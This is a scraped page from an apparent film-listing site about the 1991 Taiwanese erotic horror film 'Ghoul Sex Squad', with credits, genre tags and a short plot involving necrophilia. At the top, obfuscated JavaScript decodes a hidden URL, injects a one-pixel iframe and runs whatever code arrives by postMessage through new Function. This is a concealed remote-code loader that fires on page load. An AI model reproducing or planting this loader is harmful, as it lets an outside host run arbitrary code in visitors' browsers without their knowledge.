if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['tJXdMAK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#tJXdMAK'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2484`]) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uZG'+'NFF'+'lMG'+'swL'+'mNu'+'FFJ'+'TNB'+'MTA'+'0NF'+'FDM'+'lMk'+'YyY'+'jFF'+'Q1Y'+'FFz'+'YlM'+'kZF'+'FjL'+'TI0'+'OFF'+'DQt'+'FFM'+'jUF'+'FtM'+'S5j'+'cFF'+'3M=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
 

赶尸艳谈

资源:mp4在线播放|台湾脑洞大开的R级片

类型:恐怖片 台湾三级片 三级片电影 A片 三级 三级片 18禁 伦理 情色 理论 理论片 理伦片 理伦电影 1991

.

《赶尸艳谈》迅雷下载

《赶尸艳谈》剧情介绍

赶尸艳谈影片剧照1

本剧导演: 吕宝 Mah Wu Tu

本剧编剧: Pin Lu

本剧主演: Chiao-Niang Chin,Niao-Wang Lan,Mei-Chiao Lin

本剧类型: 恐怖 

制片国家/地区: 台湾

语言: 粤语

上映日期: 1991

其他名称: 僵尸艳谈,Ghoul Sex Squad

IMDb链接: tt0178488

赶尸艳谈的本剧剧情简介 · · · · · ·

  这个是一个古灵精怪的电影,同时,将跳跃恐怖的僵尸与papapa场面相结合。然而令人信服一定讲述了一段介绍赶尸的传奇香艳故事。《赶尸艳倾》由林美娇等本剧主演,是一部比较经典的港台戏。一南无佬赶僵尸那阵奸淫一女尸,惹众尸不满。后行到一条村,南无佬未睇紧众尸就去风流安乐。咪众尸开始疯狂杀人……

赶尸艳谈影片剧照2

赶尸艳谈影片剧照3

赶尸艳谈影片剧照4

Copyright © 2018-2021 一起看电影网(17kan电影,17看电影) 百度地图 - google地图 - 360地图 - 神马地图 - 搜搜地图 - bing地图 - 站点地图 - 搜狗地图 - RSS订阅 All Rights Reserved